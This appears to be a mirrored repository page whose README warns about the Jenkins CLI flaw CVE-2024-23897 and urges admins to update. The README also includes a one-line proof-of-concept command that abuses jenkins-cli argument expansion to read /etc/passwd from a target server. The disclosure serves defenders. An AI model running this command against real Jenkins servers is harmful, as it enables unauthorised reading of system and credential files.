KO
|
EN
gitlite — search
Search
#python
#java
#python3
#arduino
#golang
#machine-learning
#rust
#html
#flask
#javascript
#seismology
#nodejs
CVE-2024-23897
★ 15
Open GitHub ↗
CVE-2024-23897 jenkins-cli
Download README (.md)
Explore Similar Repositories
HalfSwordTrainerMod
:
Half Sword Trainer Mod
Image_Recognition_for_Microplastics
:
Using Machine Learning, Image Recognition, and Computer Vision to detect microplastics in water samples.
kmp-shared-preferences
:
Example using Multiplaform Settings
Pokedex
:
Proyecto de práctica springboot, es un API con arquitectura hexagonal, exceptions, swagger y 2 base de datos en conjunto, MySQL y MongoDB usando Docker
Java-Lecture-Code-IS-2063
:
No description available.
// repository documentation
Was this content helpful?
★ 0
(0 ratings)
Select Rating:
★
★
★
★
★
Submit Feedback
Recent Feedback
×
Download README
Do you want to download the
README.md
file for
CVE-2024-23897
?
Download (.md)
# CVE-2024-23897 CVE-2024-23897 jenkins-cli We have seen Jenkins File Leak / RCE (CVE-2024-23897) exploited in the wild and managed to reproduce it. If your Jenkins allows anonymous users or user registration, immediately update it to the latest version. ``` java -jar jenkins-cli.jar -s https://www.wevul.com @/etc/passwd ``` 